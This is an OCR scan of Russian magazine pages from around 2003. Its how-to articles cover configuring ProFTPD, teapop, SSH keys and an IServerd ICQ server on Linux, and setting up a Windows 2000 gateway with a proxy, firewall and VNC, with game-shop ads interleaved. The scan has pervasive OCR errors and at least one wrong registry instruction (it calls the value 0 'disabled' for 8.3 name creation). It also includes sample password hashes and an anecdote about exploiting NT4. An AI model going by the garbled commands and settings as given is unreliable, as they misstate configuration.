DisplayFirstChdir message 

HH Укажем пути к сообщениям. 

<Limit WRITE> 

DenyAll 

</Limit> 

## Запрещаем анонимным юзерам доза- 
писывать файлы. 

</Anonymous> 


Вот, собственно, и все важные па- 
раметры, которые необходимо пра- 
вильно проставить. Далее создаем 
файл /etc/passwd.ftpd, формат ко- 
торого в точности совпадает с 
/etc/shadow. Туда прописываем 
всех, кому необходимо иметь дос- 
тупк Нра. Затем вставляем в 
/etc/inetd.conf следующую строку: 


ftp stream tcp nowait root 
/usr/sbin/in.proftpd in.proftpd, 


которая запустит сервис ftp через 
inetd, после следующей команды 
killall -1 inetd, заставляющей пере- 
читать конфигурационный файл. 

С настройкой закончено! Пользо- 
ватели, которые прописаны в 
/etc/passwd.ftpd, будут иметь goc- 
туп к сервису. Права на этот файл 
должны совпадать с правами, Nog 
которыми запущен Ира, то есть 
владельцем passwd.ftpd должен 
быть пользователь Нр. 


ПОЧТОВЫЕ ЗАМОРОЧКИ 

В любой офисной локалке сущест- 
вует почта, которую необходимо 
правильно настроить. Я не буду ак- 
центировать твое внимание на ус- 
тановку smtpd, это не очень инте- 
ресно. Поговорим о проблеме вы- 
бора pop3d, поддерживающего 
внешнюю аутентификацию. Имеет- 
ся два самых популярных сервера - 
дроррег и teapop. Первый мы уста- 
навливать не будем, так как коли- 
чество багов в нем превышает все 
возможные пределы :). Теарор же 
отличается многофункциональ- 
ностью и безопасностью, поэтому 
рассмотрим его подробнее. 


НОМ/ТО/АДМИНИМ ПРАВИЛЬНО! 


eg я 
Конфигурация Теарор 


at Корея | 
Скачиваем {еарор по ссылке: 
http://www.toontown.org/pub/teapop/ 
teapop-latest.tar.gz. Распаковываем, 
конфигурим, инсталлируем. После 
этого немного поковыряем срайл /etc/ 
teapop.passwd, в котором указывает- 
ся, кому можно снимать почту. Для 
обычной настройки сервиса достаточ- 
но вписать пару строк в этот файл. 


empty:*:/etc/poppasswd:/var/mail:: 
default:*:reject 


Смысл этих строк довольно прос- 
той. Параметр empty означает аб- 
солютную маску для пользовате- 
лей. В /etc/poppasswd будут содер- 
жаться шифрованные пароли юзе- 
ров, директория с почтовыми сооб- 
щениями /var/mail. Затем идет 
строка default, которая запрещает 
посторонним пользователям ис- 
пользовать {еарор-авторизацию. 

Файл /etc/poppasswd будет выгля- 
деть примерно следующим образом: 


postmaster:2de/DwBdsap2R 
user:veMNdwYe287.D 


Как ты догадался, он содержит 
всего два поля - имя пользователя 
и его пароль. 

К слову, в дефолтовом 
teapop.passwd имеется значитель- 
ный мануал, судя по которому поч- 
товый сервис умеет работать с раз- 


ip | 
Правильный конфиг для ProFTPD 


wee | 


личными БД (например, mysql, 
postgresql). Мы не будем залезать в 
дебри баз данных - предлагаю ос- 
воить это самостоятельно :). 
Последним штрихом будет редак- 
тирование /etc/inetd.conf, в кото- 
рый добавляется строчка для 
{еарор. Надеюсь, ты разберешься с 
этим по аналогии с Ftpd, настройка 
которого была описана выше. 


БЕЗОПАСНЫЙ SSHD 

Как я уже говорил, мы стремимся к 
закрытию системных паролей 
офисных работников. Но бывают 
ситуации, когда необходимо дать 
работнику ssh-goctyn. В этом слу- 
чае залочить пароль не удастся. 
Если ты знаком с основными мето- 
дами авторизации, то знаешь, что 
пароль - не единственный метод 
получить доступ на сервер. Суще- 
ствует такое понятие, как $$П-клю- 
чи. Это очень удобно, и сейчас мы 
попробуем создать индивидуаль- 
ные ключики для нужного нам 
пользователя. 

В комплекте пакета OpenSSH пос- 
тавляется бинарник ssh-keygen, ко- 
торый, собственно, и занимается 
генерацией ключей. От тебя требу- 
ется указать в параметре -t тип 
ключа. ИХ 3 - rsal, rsa и dsa. После 
запуска ssh-keygen ты увидишь 
примерно следующее: 


[forb@ruhost4 forb]$ ssh-keygen -t rsal -С 
‘mykey’ 

Generating public/private rsal key pair. 
Enter file in which to save the key 
(/home/users/forb/.ssh/identity): testkey 
Enter passphrase (empty for no 
passphrase): 

Enter same passphrase again: 

Your identification has been saved in 
testkey. 

Your public key has been saved in 
testkey.pub. 

The key fingerprint is: 
8c:b3:1f:67:ab:01:8¢:ae:60:a1:98:39:32:a5:6c:61 
mykey 


После этих действий будут созданы 
файлы testkey и testkey.pub (приват- 
ный и публичный ключ, соответ- 
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Два самых no- 
пулярных pop3 
сервера под 
Линь - дроррег 
и teapop. Ko- 
личество багов 
в первом пре- 
вышает все 
возможные 
пределы :). 
Теарор же от- 
личается мно- 
гофункцио- 
нальностью и 
безопас- 
ностью. 


Если ты зна- 
ком с основ- 
ными MeTOga~ 
ми авториза- 
ции, то зна- 
ешь, что па- 
роль - не 
единственный 
метод полу- 
чить доступ 
на сервер. Су- 
ществует та- 
кое понятие, 
как $$й-клю- 
чи. Это очень 
удобно. 


Улому UDO 


HOWTO/ADMUHUM ПРАВИЛЬНО! 


ОСи 4work 


Если сервер 
защищен фа- 
ерволлом, то 
ты можешь 
выделить пор- 
ты, которые 
будут исполь- 
зоваться для 
передачи дан- 
ных, предвари- 
тельно сняв с 
них фильтр. 
Интервал пор- 
тов задается 
опцией Passi- 
vePorts в 
/etc/proftpd.conf 


Свой ICQ-cep- 
вер очень ygo- 
бен: работники 
могут быстро 
передать нуж- 
ный файл по 
Аське и обме- 
няться парой 
фраз, к тому 
же для удоб- 
ства можно 
раздавать уи- 
ны по какому- 
либо критерию 
- например, по 
номеру каби- 
нета, рабочей 
станции и т.п. 


ственно). Затем скопируй публичный 
ключ в папку .ssh под именем author- 
ized_keys, а приватный транспорти- 
руй на машину работника офиса, ко- 
торому необходимо предоставить 
шелл. Этот ключ должен находиться 
в папке .ssh под именем identity. 

Что-то не работает? Запускай 
/usr/bin/ssh с параметром -\ (ge- 
баг), после этого ты увидишь пол- 
ный логинг пакетов и быстро раз- 
берешься, в чем дело. 

Теперь можешь залочить пользо- 
вателям пароли, потому как мы пос- 
тавили основные сервисы, которые 
не привязываются к /etc/shadow. Это 
можно сделать как вручную (прямым 
редактированием теневого сфайла), 
так и командой passwd -| username. 


СВОЙ ICQ-CEPBEP 

В ОФИСНОЙ СЕТИ 

Как показывает практика, все офис- 
ные работники активно общаются в 
ICQ. Общаются, несмотря на предуп- 
реждения и фаерволлы, поставлен- 
ные админами. Хотя у Аськи и мини- 
мальный традрик, но в сумме это мо- 
жет вылететь в значительное число 
мегабайт ;). Если порыться Ha Фреш- 
мите, можно найти софт, который поз- 
воляет юзать собственный ICQ-cep- 
вер в локальной сети. Это и полезно, 
и удобно одновременно: посуди сам, 
работники могут быстро передать 
нужный файл по Аське и обменяться 
парой фраз. Кроме того, для удобства 


Создаем пару ключей 45а 


можно раздавать уины по какому-ли- 
бо критерию - например, по номеру 
кабинета, рабочей станции и т.п. 
Теперь о сложностях. Сервер, ко- 
торый я бы рекомендовал устано- 
вить, носит название |5егуега. У не- 
го достаточно много зависимостей, 
одна из которых PostgreSQL (а так- 
же ncurses, но они устанавливают- 
ся по умолчанию ;)). На многих сер- 
верах в качестве БД присутствует 
лишь mySQL, но |5егуега нужен 
только Postgres. Автор мотивирует 
это тем, что Постгрес содержит все 
необходимое для правильной рабо- 
ты сервера (поддержка транзакции 
с блокировкой на уровне строк, би- 
нарных объектов до 1 кб и тригге- 
ров), чего не скажешь о MySQL. 
Ознакомившись и устранив все за- 
висимости, выкачиваем |Serverd по 
ссылке: http://iserverd.khstu.ru/down- 
load/IServerd-stable.tar.gz. После этого 
выполним следующий список команд. 


tar xzvf ./IServerd-stable.tar.gz 
cd IServerd-stable 

./configure -with-russian 
make all 

make install 


ГЕЕВ 
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Чтобы в сервере была поддержка 
русских сообщений, укажем соотве- 
тствующую опцию конфигуратора. 
Следующим шагом будет настройка 
iserv.conf. Этому файлу нужно yge- 
лить особое внимание, потому как 
каждая опция в нем включает или 
запрещает какую-нибудь важную 
фичу. Берем дефолтовый конфиг из 
каталога data/etc, переименовываем 
его в /etc/iserverd/iserv.conf и вни- 
мательно смотрим на его параметры. 


[Globals] 


Bind on all interfaces = No 

Bind interface = 0.0.0.0/32 

Listen port = 4000 

HH Указываем, Ha какой интерфейс и порт 
сажать iserverd. Если хочешь прослуши- 
вать порт на всех интерфейсах машины, 
проставь параметру Bind all значение Yes. 
Pid file path = @VAR_DIR@/iserverd.pid 
Translate path = @ETC_DIR@/translate 
Translate table = RUSSIAN_WIN 

Var dir path = @VAR_DIR@ 

#H Убедись в наличии файлов перекоди- 
ровки и pid, иначе сервер не запустится. 
По умолчанию RUSSIAN_WIN расположен в 
etc/data, поэтому придется перетащить его 
вручную. 

Server mode = daemon 

Min childs = 4 

Max childs = 100 

Default ping time = 120 

Externals number = 0 

Е Эти значения не меняй. Они подобраны 
грамотными разработчиками ;). 

Admin email = root@localhost 

Info Password = DEFAULT 

## Здесь впиши свой e-mail и пароль для 
использования тулз администрирования 
iserverd. 

database user = iserverd 

database password = sicq 

#4 Смени эти данные. Они необходимы 
для корректного входа в PostgreSQL co 
стороны iserverd. 

database addr = 

database port = 5432 

users db name = users_db 

+ Данные о датабазе. Работают по умол- 
чанию :). 

Log level = 10 

Debug level = 10 

НН Если не хочешь мусора, занули эти 


Полный дебаг от ssh 


Конфигурация 1$егуега 


значения. 
V3 registration enabled = Yes 

V3 auto registration = Yes 

V3 post-register info = 
etc/texts/post_reg_auto.txt 

## Если тебе влом самостоятельно добав- 
лять юзеров и ты хочешь поддержки авто- 
регистрации, включи эти параметры. 0бя- 
зательно убедись в наличии файла 
etc/texts/post_reg_auto.txt, иначе авторег 
не будет работать. 


С настройкой конофа закончили. 
Теперь перейдем в папку scripts. 
Там ты найдешь файл 
db_manage.sh. Подредактируй в 
нем имя пользователя и пароль 
для входа в базу. Затем запускай с 
параметром create users_db. Будут 
созданы важные таблицы для рабо- 
ты сервера. Там же есть скрипт 
icquser, с помощью которого ты мо- 
жешь вручную добавить, удалить 
1сд-пользователей, а также прос- 
мотреть данные по ним. Это делает- 
ся запуском icquser с параметром 
add, del и info, например: 


Jicquser add 140 


Добавит пользователя с уином 
140 (перед этим скрипт интерактив- 
но попросит ввести пароль и базо- 
вые данные). 

Последним шагом будет добавле- 
ние iserverd в inetd.conf. Это мы ge- 
лали уже два раза, поэтому не буду 
заострять на конфе внимание ;). 

Хотелось бы обратить внимание 
на логи |Serverd. Я рекомендую nog- 
редактировать /etc/syslogd.conf, 
чтобы отделить записи ICQ-cepBepa 
от общего /var/log/messages. Для 
этого дозапишем в конфиг следую- 
щие строки. 


"Server 
** /var/log/IServer.log 


После этого пошлем процессу sys- 
[094 сигнал 1, и iserverd будет писать 
логи в |Server.log. Кстати, в папке 
/etc/iserverd ты обнаружишь файл 
debug.log, который предназначен для 
отлова багов ;). Если Bgpyr найдешь 
там инфу о неизвестных пакетах, 
пошли их создателю демона, чтобы 
устранить ошибки в следующих ре- 
лизах. 

Вот, собственно, и все. Установ- 
кой |5егуега ты убьешь двух зай- 


Внутренности скрипта icquser.sh 


цев: теперь работники сети могут общаться между со- 
бой и обмениваться файлами, а ты забудешь о пробле- 
ме оплаты традфика за [СО :). 


КЛИЕНТСКАЯ ЧАСТЬ 

Настройка рабочего сервера дело благородное. Но сто- 
ит упомянуть и о клиентской стороне. Поэтому в перс- 
пективе ты можешь заставить работников перейти на 
Linux. Да, я не спорю, Linux может юзаться как в каче- 
стве сервера, так и в роли рабочей станции. Но заста- 
вить кого-то променять любимый Мастдай на сложный 
Linux очень трудно. Хотя в Linux есть практически все 
для работы (в этом ты лишний раз убедишься, дочитав 
этот номер до конца). Для бухгалтера существуют пор- 
ты 1С, для программера удобные редакторы кода и сре- 
ды программирования (Kylix, например), для дизайнера 
- удобные редакторы HTML, РНР и CGI скриптов, а так- 
же любимый Gimp :). Если юзеры локалки поверят в су- 
пербезопасность и возможности Линя, то у тебя есть 
реальный шанс подсадить их на правильную ось. 

Итак, я надеюсь, ты понял: чтобы тебя считали луч- 
шим админом, необходимо сочетать установку безо- 
пасного софта с удовлетворением (насколько это воз- 
можно) извращенных запросов твоих клиентов, подни- 
мая для них хороший софт. Если ты раньше думал, что 
работать админом сложно и неинтересно, надеюсь, 
этот материал тебя переубедил ;). 
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Grand Theft Auto: 


Vice City 


Silent Hill 2 


Neverwinter 
Nights: Shadows 
of Undrentide 
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Star Wars 
Galaxies: An 
Empire Divided 


Metal Gear 
Solid 2: Substance 


УДОБНО = 
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С ДОСТАВКОЙ HA ДОМ 
ДОСТУПНО 


Tomb Raider: The 
Angel of Darkness 


WarCraft Ш The 
Frozen Throne 


Deus Ex 2: 


Invisible War 
(DX2) 


Dark Age of 
Camelot: Gold 
Edition 


|| 


The Matrix : 
Enter The Matrix 


Republic: 
The Revolution 


Заказы по интернету — круглосуточно! e-mail: sales@e-shop.ru 


— 4 аказы no телефону можно сделать 
с 10.00 до 21.00 с понедельника по пятницу 
с 10.00 до 19.00 св субботы по воскресенье 


СУПЕРПРЕДЛОЖЕНИЕ ДЛЯ ИНОГОРОДНИХ ПОКУПАТЕЛЕЙ: 


стоимость доставки „снижена на 10%! 


(095) 928-6089 (095) 928-0360 (095) 928-3574 
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Редактор Anjuta - рай для офисного программера! 


УЛИЦА Дом КОРПУС КВАРТИРА 
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HOWTO/CTAPAS СКРИПУЧАЯ ФОРТОЧКА 


ОСи 4work 


Если IP, прис- 
военный юзе- 
ру осью сер- 
вера удален- 
ного доступа, 
при соедине- 
нии окажется 
дублем IP, уже 
занятого в се- 
ти, то оба 
компа-конку- 
рента начнут 
жутко тормо- 
зить, а потом 
и вовсе могу 
упасть в даун. 


МТЕ$ по опре- 
делению имеет 
более высо- 
кую устойчи- 
вость, может 
поддерживать 
шифрование и 
архивацию на 
уровне файло- 
вой системы. 


Vint (vint@townnet.ru) 


е веришь, что так бы- 

вает? Вот тебе прав- 

дивая история о том, 
как я докатился до установки маст- 
дая на сервак. Началось все непло- 
хо. Я с помощью знакомого админа 
инета, команды тап (для тех, кто в 
пингвинах только Startx знает, Man 
вызывает встроенную помощь о 
данной команде или программе) 
поставил у себя на четверке лину- 
ховый гейт. Вся локалка ликовала - 
экономия + скорость реально стали 
заметны. Я же спокойно готовился 
к сдаче ненавистных экзаменов, пе- 
риодически собирая денежки на 
новый дистр Линуха. И вот отсыпа- 
юсь я после экзаменов, когда раз- 
дается телефонный звонок. С тру- 
дом продрав глаза, я смутно пони- 
маю, что мне предлагают поставить 
и настроить им нечто подобное мо- 
ему гейту, но только с одним разли- 
чием: сервак должен крутиться иск- 
лючительно на МТ системе. Так как 
им проще, и они больше доверяют 
“серьезной организации Микро- 
софт", чем “кучке компьютерных 
хулиганов" (кто в танке, это так 
обозвали линух тим). Я повелся на 
обещание ‹фришного инета и быст- 
ренько взялся за дело. Взялся-то 
быстро, а вот делал... Короче, дали 
мне вот такую машинку: чистокров- 
ный пень второй с 266 мегагерца- 
ми, памяти 64 метра да идешный 
винт на 4 гига, видюшка ноунэйм - 
серверу она только на первой вре- 
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СТАРАЯ СКРИПУЧАЯ 
ФОРТОЧКА 


СТАВИМ МТ'ВЫЙ FEAT НА СТАРЫЙ МЕТАЛЛ 


мя и нужна. Да строгий наказ ста- 
вить “исключительно” Винды. 


ДЕРЕВЯННЫЕ РАМЫ 

ИЛИ ПЛАСТИК? 

Сначала встал вопрос выбора ОС: 
брать МТ4 или сразу 2K (про 2003 
не говорю - ограничивает железо, 
не запустить его на такой конфигу- 
рации)? Блуждания по инету меня 
не привели ни к одному решению. 
Тогда я решил поставить сначала, 
для пробы, NT4 SP6, чтобы самому 
потестить этого прародителя NT5. 
Встала она на ура - железо для нее 
рульное. Но возникли гемы с наст- 
ройкой сетевух (ну не хотела она 
верить, что карты висят не Ha ISA, и 
все тут!), на которые ушло полдня. 
Проблемо я решин, но остался воп- 
рос безопасности - это ведь сервак 
как-никак. Ровно полчаса понадо- 
билось на изучение багтрака и 
столько же на секьюритизоне, пос- 
ле чего стало ясно, что я очень по- 
торопился с выбором - в сети полно 
разных эксплоитов дыр данной сис- 
темы, даже патченной шестым па- 
ком. Так что после испытания одно- 
го из них в действии я окончатель- 
но снес NT4 - за десятиминутную 
атаку была получена удаленная 
консоль с правами админа. 
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СТАДА КЛАСТЕРОВ 

Следующим кандидатом стал Вин- 
довс 2000 сервер, и я уже было 
собрался его ставить, но предстоял 
еще один выбор: брать МТЕ$ или 
старую добрую FAT32. NTFS по оп- 
ределению имеет более высокую 
устойчивость, может поддерживать 
шифрование и архивацию на уров- 
не файловой системы, у него более 
развитая структура разделения 
прав, но при этом он работает Meg- 
ленней FAT32, требует больше опе- 
ративы для работы и поддержива- 
ется исключительно МТ ядром (Ли- 
нукс и различные драйвера для 9х 
я не учитываю). У FAT32 устойчи- 
вость ниже, отсутствует поддержка 
шифрования и архивирования 
средствами самой файловой систе- 
мы, но зато скорость работы выше 
и совместимость с другими ОС есть. 
Я выбрал NTFS, так как мне нужны 
стабильность и шифрование, а сов- 
местимость не нужна, ведь комп бу- 
дет работать серваком, а не прос- 
той рабочей лошадкой с пятью раз- 
ными системами на борту. 

Дальше необходимо грамотно 
разбить винт, ведь и от этого зави- 
сит многое - начиная с производи- 
тельности (за которой я так гонюсь 
на слабой машинке) и заканчивая 


защищенностью. A если винт маленький, как у моего 
артефакта, то просто необходимо разбить его похит- 
рей, чтобы сохранить так необходимые метры. Вообще, 
NTFS позволяет выбирать размер кластера от 512 байт 
go 4096 байт (и это не предел), что позволяет более 
экономно использовать пространство на винте. Так, ес- 
ли у тебя на серваке куча файлов, имеющих длину 1-2 
байта (а они неизбежно появятся в ходе работы), то 
при размере кластера 4096 байт ты потеряешь 4 кило- 
байта на каждом таком файле. Это немного, но если 
файлов тысячи и далеко не у каждого файла размер 
кратен 4096 байтам (что является оптимальным сай- 
зом, так все кластеры занимаются полностью), то поте- 
ри могут доходить до сотни-другой мегов. А если на 
винте лежит здоровый фильм, занимающий дофига 
кластеров, то при его просмотре или копировании ско- 
рость работы всего компа падает, ведь ОС нужно про- 
читать каждый кластер и найти следующий, причем 
выполнить это очень быстро. Вот почему на серверах 
начали создавать, как минимум, три раздела: первый - 
системный, на него ставим серверную ОС; второй - с 
максимальным размером кластера, поддерживаемым 
данной файловой системой, на нем будут храниться 
фильмы, музыка и здоровенные софтины; и третий - с 
минимальным размером кластера, туда будут сейвить- 
ся временные файлы, все хтмлки, скрипты, почта юзе- 
ров и прочие мелочи. После такого хитрой разбивки я 
был уверен, что выжал из винчестера максимальную 
емкость, и двинулся дальше. 


СТАВИМ И ОПТИМИЗИМИЗУЕМ 

Установка самой ОС не вызвала особых проблем, все 
стало в пределах нормы без глюков. Необходимые gpo- 
ва для железа нашлись в инете. Дело встало лишь за 
оптимизацией ОСи. 

Для повышения скорости соображалки твоего сервака 
хорошо бы увеличить зарезервированную кэш-память. 
Это можно сделать, изменив в реестре значение ключа 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ 
Control\SessionManager\Memory-Management\ 
LargeSystemCache типа REG_DWORD с О ua 1. Но надо 
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Запустим ручки в реестр... по локоть 
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Технические параметры: 


Процессор: Intel Pentium—-3 733 Mhz 
Графический процессор: 

nVidia XGPU 233 Mhz 
Производительность: 125 Млн non./cek 
Память: 64 Mb 200 Mhz DDR 

Звук: nVidia MCPX 200 Mhz, 

256 каналов, Dolby Digital 5.1 

Прочее: 2-5x DVD-drive, жесткий диск 8 Gb, 
4xUSB-nopta, сетевая плата 100 MBps 
Воспроизведение О\/О-фильмов 


$83.99*/79.99 


Return to Castle 
Wolfenstein: 
Tides of War 


$83.99*/85.99 


Tao Feng: 
Fist of the Lotus 


Заказы по интернету — 
круглосуточно! 
e-mail: sales@e-shop.ru 
Заказы по телефону 
можно сделать 
с 10.00 до 21.00 пн — пт 
с 10.00 до 19.00 сб - вс 


Dead or Alive СУПЕРПРЕДЛОЖЕНИЕ ДЛЯ 

Xtreme Beach ИНОГОРОДНИХ ПОКУПАТЕЛЕЙ 

Volleyball стоимость доставки = 
снижена на 10%! 


Pirates of the 
Caribbean 


* — цена на американскую версию игры (NTSC) 


(095) 928-6089 (095) 928-0360 (095) 928-3574 
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OCu 4work 


Многие юзеры 
качают из 
инета одно и 
то же по нес- 
колько раз, 
так что кэши- 
рующий прок- 
си и немного 
места на винте 
помогут серь- 
езно эконо- 
мить деньги. 


На серверах 
создают, как 
минимум, три 
раздела: пер- 
вый - систем- 
ный, второй - 
с максималь- 
ным размером 
кластера для 
хранения 
фильмов и му- 
зыки, и третий 
- с минималь- 
ным размером 
кластера для 
временных 
файлов, почты 
юзеров и про- 
чей мелочи. 


учесть, что если у тебя маловато 
оперативы, то такой финт может 
ухудшить работу с сетью - увеличит- 
ся нагрузка на своп, который обла- 
дает очень малой производитель- 
ностью по сравнению с оператив- 
кой. Еще я предлагаю оптимизиро- 
вать файловую систему, чтобы хоть 
еще на грамм поднять скорость ра- 
боты сервера. Для этого мы прове- 
дем парочку несложных действий: 
во-первых, изменим параметр 
“loPageLockLimit” в ключе 
[HKEY_LOCAL_MACHINE\SYSTEM\ 
CurrentControlSet\Control\Session 
Manager\Memory Management]. 3Ha- 
чения loPageLockLimit при объеме 
оперативы в метрах такие: 32 mb - 
4096000; 64 mb - 8192000; 128 mb - 
16384000; 256+ mb - 65536000. Это 
позволит тебе несколько ускорить 
работу с винтом за счет выделения 
большего количества памяти на кэ- 
ширование. А во-вторых, уберем 
возможность МТЕ$ создавать имена 
файлов, совместимые со стандартом 
ДОС. Для этого найдем в реестре та- 
кой ключ: 
[HKEY_LOCAL_MACHINE\SYSTEM\ 
CurrentControlSet\Control\FileSyste 
т] и изменим параметр 
NtfsDisable8dot3NameCreation на 0. 
Сейчас перезагрузка и создание go- 
полнительных имен формата 8.3 
отключены. Но есть одно "но": MHO- 
гие программы для ДОС, работаю- 
щие с диском, могут вылетать с 
ошибкой файловой системы. Если 
ты столкнулся с этой траблой, то ли- 
бо включи обратно параметр (изме- 
ни значение на 1), либо помести 
софтину в каталог, имя которого не 
превышает 8 символов в длину и 
содержит не более 255 вложений. 

И наконец, последний сринт с реест- 
ром: в ключе [HKEY_LOCAL_MACHINE\ 
SYSTEM\CurrentControlSet\Control\ 
FileSystem] создаем параметр с име- 
нем “NtfsDisableLastAccessUpdate”, 
тип REG_DWORD и делаем его рав- 
ным единице. Сейчас ты отключил 
редко используемую возможность 
NTFS по изменению времени Nocneg- 
него доступа к каталогу. Если у тебя 
много вложенных папок, то ты заме- 
тишь ускорение невооруженным гла- 
зом. После несложной оптимизации 
мы можем смело переходить к наст- 
ройке непосредственно самого сер- 
Baka: прокси, фаерволла и т.д. 


ПОДОИМ СЕРВЕР 

Для начала поднимем часть, отвеча- 
ющую за дозвон ;), чтобы организо- 
вать на этом компе сервер удаленно- 
го доступа и попользоваться благами 
халявного инета в нерабочее время. 
Все тут достаточно просто: ставим мо- 
дем, устанавливаем на него дрова. 
Дальше запускаем мастера новых 
подключений (if you in broney train), 
кликаем правой кнопкой по сетевому 
окружению (My Network Places), вы- 
бираем свойства (Properties), a ganb- 
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'рамотный прокси с приятным фейсом 


ше создаем новое подключение 
(Create a new connection), а там юзаем 
пункт set up advance connection. Чтоб 
не было наездов и Opa скажу сразу, 
что у меня Винда английская и я не 
променяю ее ни на какую русифика- 
цию, поэтому иногда буду говорить 
чиста англицкие пункты. Теперь твоя 
система сможет принимать входящие 
звонки, то есть будет брать трубку, 
когда модем зафиксирует сигнал, и 
проверять имя юзера/пасс, но она не 
сможет нормально пустить его в инет. 
Если юзер, подцепленный к виндово- 
му серваку по модему, попробует 
вбить адрес страницы, то он, по идее, 
сможет ее загрузить, но есть огром- 
Hoe HO! IP, присвоенный юзеру Вин- 
дой при соединении, вылезет в сеть, 
и если в сети уже есть такой IP, прои- 
зойдет очень нехорошая вещь: оба 
компа-конкурента начнут жутко тор- 
мозить, а потом и вовсе могу упасть в 
даун. Но даже если IP свободен, про- 
вайдерские админы тебе кинут огром- 
ное предупреждение - левые ГР в ло- 
калке очень мешают при работе сер- 
ваков, да и организовывать нужно 
юзеров, а то за неделю расползутся 
по всему диапазону от 0.0.0.0 до 
255.255.255.255. Вот поэтому необхо- 
димо разграничить сеть с дозвоном и 
не выпускать левых IP в локалку. 


НЕКИСЛЫЙ ПРОКСИК 
Обеспечить такое разграничение 
призван прокси-сервер. В инете 
развелось огромное количество их 
модификаций, с разными возмож- 
ностями и разной ценой. Но тебе 
нужно учесть, что наша машинка 
не самая мощная, и поэтому необ- 
ходимо выбирать софтину, которая 
выполняет роль именно прокси, а 
не всякого фильтра и защитника 
сети. Только так мы сможем сохра- 
нить приемлемую скорость работы 
сервака. Мой выбор пал на очень 
неплохую программку: CoolProxy 
(http://www.coolproxy.narod.ru). В 
моем распоряжении оказалась вер- 
сия 1.4. Это полноценный прокси- 
сервер с развитой поддержкой кэ- 
ширования. Вот его плюсы: простая 
установка и настройка, очень гра- 
мотное кэширование грасфики, то 
есть самой трафожрущей части, 
достаточно простой и понятный 
русский фейс, возможность заказа 
веб-страниц (ты смотришь главную 
страницу сайта, находишь нужные 
ссылки, кликаешь по ним, и если ты 


сейчас оф-лайн, прога предложит 
“заказать” нужные паги, и они бу- 
дут загружены автоматически в 
следующий раз). Удобно? Мне то- 
же понравилось, особенно если 
учесть, что к вечеру я забываю, 
что хотел скачать ночью... И самый 
главный плюс - возможность прос- 
мотра в оф-лайне всех страниц, по- 
сещенных во время серфа, причем 
эти странички сейвятся очень куль- 
турно: в папке с прогой создается 
каталог cache и в нем создаются 
подкаталоги - типа Www.porno.ru. 

К несчастью, минусы тоже есть: от- 
сутствует хелп, при использовании 
этой софтины на одиночном компью- 
тере, подключенном к инету через мо- 
дем, падает скорость работы соедине- 
ния. Причина проста: сначала проис- 
ходит скачивание в кэш, а потом 
только эти данные приходят к браузе- 
ру. Еще эта прога - шароварная, это 
формальность, конечно, но тем не ме- 
нее. А еще был замечен такой весе- 
лый глюк: этот прокси определяет, 
подключен ли ты к сети, просто пин- 
гуя указанный сервак (по умолчанию 
- любимый microsoft.com), но я, решив 
провести массовую оптимизацию, 
указал сайт нашей локалки, и только 
он вырубился (гроза была...), прога 
начала выдавать все страницы иск- 
лючительно из кэша. И только слу- 
чайно это заметили - курс доллара на 
Яндексе оказался староватым. То 
есть моя интрасеть некоторое время 
работала вообще без связи с внеш- 
ним миром, только благодаря закро- 
мам этой программульки. А это гово- 
рит о том, что очень многие юзеры ка- 
чают из инета одно и то же по нес- 
колько раз. Так что ставьте, начинаю- 
щие админы, кэширующий прокси, 
выделяйте побольше места на винте 
и рулите своей сетью, экономя деньги 
на новый девайсик. 


КОЛЮЧИЙ ЗАБОРЧИК 

Дальше, раз уже мы решили делать 
все грамотно, нам следует поставить 
фаерволл для защиты от внешних 
атак и от атак доморощенных “хаке- 
ров" на инет (а то придут к тебе раз- 
долбаи из органов). Для этого я, ру- 
ководствуясь кое-каким опытом и со- 
ветами знакомых админов, выбрал 
соффтину с именем Argnitum Outpost 
Firewall Pro (www.agnitum.com/down- 
load/). Опишу лишь самые важные ee 
плюсы: малый размер дистрибутива, 
несколько режимов работы (бездей- 
ствие, обучение, разрешение того, 
что не запрещено, и запрещение то- 
го, что не разрешено), русский фейс, 
наличие готовых правил для многих 
COCPTUH (например, опера, бат, 
експлорер, аутглук были уже настро- 
ены), возможность апгрейда с по- 
мощью плагинов. Tak, уже по дефол- 
ту, ставятся очень полезные вещи: 
кэширование DNS, которое резко 
уменьшает время поиска IP-agpeca, 
блокиратор рекламы, позволяющий 


вырезать надоедливые баннеры по размеру и по ссыл- 
кам, детектор атак и кое-какие еще. Еще мне понравилось 
то, что при модификации запускного файла, который 
раньше имел разрешение на связь с инетом, она очень 
громко кричит об этом. 


ПУЛЬТ К ТЕЛЕКУ 

И последним очень важным пунктом будет управление 
сервером. Ведь нет смысла серверному компу иметь 
постоянную видеокарту и монитор. Вот поэтому я пред- 
лагаю использовать софтину для удаленного админи- 
стрирования. Мне больше всего нравится простая в ис- 
пользовании программулька WinVNC 
(http://www.realvnc.com). На момент написания статьи 
последняя версия 3.3.7, вес проги - 564 кб. Вся програ- 
ммка состоит из двух частей: первая вешается на уп- 
равляемый компьютер и слушает определенный порт, а 
вторая устанавливается на комп, с которого ты хочешь 
рулить сервак. Дальнейшая работа с такой программой 
не вызовет проблем - перед тобой обычный рабочий 
стол мастдая (или линухи, но это не сюда), на котором 
можно производить манипуляции хвостатым создани- 
ем. Также советую эту прогу установить всем знакомым 
ламерам, которым ты помогаешь при настройке компа, - 
так ты сможешь, не отрываясь от своего ящика, настро- 
ить комп челу хоть из Африки. Скорость работы впол- 
не приемлемая: я с модема могу конфигурить сервак, 
чем сейчас по совместительству и занимаюсь ;). 


СЕРВЕР ЖИЛ, 

ЖИВ И БУДЕТ ЖИТЬ 

А теперь некоторые итоги на примере моего сервера. 
Сейчас он благополучно работает в качестве шлюза в 
инет, сервера удаленного доступа, фаерволла и кэши- 
рующего прокси. Установка такого компьютера на гра- 
нице интрасети и инета позволит сэкономить денежки 
и нервы юзеров. Также существенно облегчится учет 
трафика, просиженного пользователями. При всех по- 
ложительных чертах были замечены кое-какие мину- 
сы: понизилась скорость работы в сети, больше рабо- 
ты стало у местного админа по причине потенциальной 
нестабильности Винды. Для полноценной работы сер- 
вера необходимо больше оперативной памяти, недос- 
таток которой очень четко проявляется в разгар рабо- 
чего дня (сеть начинает тормозить, выскакивают сооб- 
щения об ошибках при коннекте к прокси-серверу, и 
сам сервак резко увеличивает время ответа на пинг). 
Если бы юзеров в сети было поменьше (не больше 10 
компов), то все было бы тип-топ, а вот при таком раск- 
ладе лучше всего поставить консольный линух и на 
нем настроить все вышеописанные сервисы. Хотя если 
скорость не столь критична, да и в пингвиньей консо- 
ли ты слабоват, ставь Винды - они вполне могут вы- 
полнять функции простого в настройке сервера. 


Вот так можно настроить халявный инет дома 


